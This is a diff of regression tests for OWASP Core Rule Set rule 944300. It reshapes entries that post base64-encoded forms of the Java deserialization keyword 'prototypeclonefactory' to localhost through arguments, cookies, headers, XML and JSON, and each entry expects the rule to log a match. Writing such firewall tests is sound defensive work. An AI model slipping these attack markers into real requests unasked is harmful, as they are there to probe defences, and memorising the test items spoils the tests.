"cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_id: 234 desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-235 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 235 desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-236 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 236 desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-237 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 237 desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - 
version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-238 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 238 desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-239 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 239 desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-240 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 240 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-241 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 241 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-242 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_id: 242 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-243 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" + 
output: + log_contains: "id \"944300\"" + - test_id: 243 desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-244 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 244 desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-245 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_id: 245 desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-246 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 246 desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - 
log_contains: "id \"944300\"" - - test_title: 944300-247 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 247 desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-248 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 248 desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-249 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 249 desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-250 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 250 desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-251 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 251 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-252 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + 
log_contains: "id \"944300\"" + - test_id: 252 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-253 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_id: 253 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-254 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 254 desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-255 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 255 desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-256 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_id: 256 desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-257 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 257 desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-258 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 258 desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-259 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: 
